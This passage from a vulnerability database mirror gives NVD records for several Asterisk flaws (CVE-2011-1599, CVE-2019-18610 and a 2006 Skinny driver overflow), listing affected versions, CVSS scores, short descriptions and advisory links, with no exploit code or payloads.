              "criteria": "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F156798F-F2EF-4366-B17E-03165AB437D5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta7:business:*:*:*:*:*",
              "matchCriteriaId": "1C4E15BB-71AB-4936-9CA7-E844572A3953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta8:business:*:*:*:*:*",
              "matchCriteriaId": "EE5823E1-5BFF-44E0-B8DD-4D994073DC1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "E6C147EF-0C39-4979-A4F6-C0BE288F083F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "0C1A8352-DE70-4D4E-BC4D-8EABE5431646",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "615D7356-E9DD-4149-B1BE-D3C3475A8841",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "0628E34F-1A60-416D-A29C-EA28E8CC2430",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "5F54511A-A2A9-4038-9D7D-2283A6709DB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "9BCF12B0-4B8D-499D-B5DE-FB0CD9EEC3B4",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "E431AF4E-C6A8-424F-9205-01F5FDFB3306",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "52BE29C5-C2C3-4414-A8E1-4D4D926F6E65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "87BBDF0F-7A23-48BA-98BC-0EDEDD2CDDF8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "manager.c in the Manager Interface in Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 does not properly check for the system privilege, which allows remote authenticated users to execute arbitrary commands via an Originate action that has an Async header in conjunction with an Application header."
    },
    {
      "lang": "es",
      "value": "manager.c en la interfaz de administrador de Asterisk Open Source v1.4.x antes de v1.4.40.1, v1.6.1.x antes de v1.6.1.25, v1.6.2.x antes v1.6.2.17.3, y v1.8.x antes de v1.8.3.3 y Asterisk Business Edition Cxx antes vC.3.6.4 no comprueba correctamente el privilegio del sistema, lo que permite a usuarios remotos autenticados ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de una acci\u00f3n \"Originate\" que tiene un encabezado Async en relaci\u00f3n con un encabezado Application."
    }
  ],
  "id": "CVE-2011-1599",
  "lastModified": "2024-11-21T01:26:41.010",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-04-27T00:55:04.820",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-006.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://openwall.com/lists/oss-security/2011/04/22/6"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44197"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://secunia.com/advisories/44529"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://securitytracker.com/id?1025433"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securityfocus.com/bid/47537"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/1086"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.vupen.com/english/advisories/2011/1107"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.vupen.com/english/advisories/2011/1188"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.digium.com/pub/security/AST-2011-006.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://openwall.com/lists/oss-security/2011/04/22/6"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44197"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/44529"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025433"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/47537"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/1086"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2011/1107"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.vupen.com/english/advisories/2011/1188"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-11-22 18:15

Modified

2024-11-21 04:33

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2019-007.html	Patch, Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
cve@mitre.org	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2019-007.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
digium	certified_asterisk	13.21.0
debian	debian_linux	8.0
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3000F83F-4D47-4BA8-BF35-844C41BFBE18",
              "versionEndExcluding": "13.29.2",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "65C549ED-B864-47C9-ACD8-C695FC7DAE57",
              "versionEndExcluding": "16.6.2",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F12809-5F7E-4B99-A028-30B43BAFB5A6",
              "versionEndExcluding": "17.0.1",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9FC7665A-FF2F-4A20-B695-96C2217D268E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "18C39C0A-7F81-4734-8C1D-4FFDF070F526",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F809DB3A-457F-4DEF-9B11-E3FCDF2D8466",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1F170494-F60A-42C2-A2CE-1BB5BDCC8200",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "2A28B713-6CBB-4F4D-A54B-17758DD35EE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B7D110F5-E431-4F31-8723-494D20D9108D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en el archivo manager.c en Sangoma Asterisk versiones hasta 13.x, 16.x, 17.x y Certified Asterisk versiones 13.21 hasta 13.21-cert4. Un usuario de Asterisk Manager Interface (AMI) autenticado remoto sin autorizaci\u00f3n del sistema podr\u00eda usar una petici\u00f3n Originate AMI especialmente dise\u00f1ada para ejecutar comandos arbitrarios del sistema."
    }
  ],
  "id": "CVE-2019-18610",
  "lastModified": "2024-11-21T04:33:21.593",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-11-22T18:15:11.030",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-10-23 17:07

Modified

2024-11-21 00:19

Severity ?

Summary

Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow.

References

URL	Tags
cve@mitre.org	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12	Patch
cve@mitre.org	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	Patch
cve@mitre.org	http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html
cve@mitre.org	http://secunia.com/advisories/22480	Patch, Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/22651
cve@mitre.org	http://secunia.com/advisories/22979
cve@mitre.org	http://secunia.com/advisories/23212
cve@mitre.org	http://securitytracker.com/id?1017089	Patch
cve@mitre.org	http://www.asterisk.org/node/109	Patch
cve@mitre.org	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
cve@mitre.org	http://www.kb.cert.org/vuls/id/521252	US Government Resource
cve@mitre.org	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html
cve@mitre.org	http://www.osvdb.org/29972
cve@mitre.org	http://www.securityfocus.com/archive/1/449127/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/archive/1/449183/100/0/threaded
cve@mitre.org	http://www.securityfocus.com/bid/20617	Exploit, Patch
cve@mitre.org	http://www.us.debian.org/security/2006/dsa-1229
cve@mitre.org	http://www.vupen.com/english/advisories/2006/4097
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/29663
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12	Patch
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	Patch
af854a3a-2127-422b-91ae-364da2661108	http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22480	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22651
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/22979
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/23212
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1017089	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.asterisk.org/node/109	Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml
af854a3a-2127-422b-91ae-364da2661108	http://www.kb.cert.org/vuls/id/521252	US Government Resource
af854a3a-2127-422b-91ae-364da2661108	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/29972
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/449127/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/archive/1/449183/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/20617	Exploit, Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.us.debian.org/security/2006/dsa-1229
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/4097
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/29663

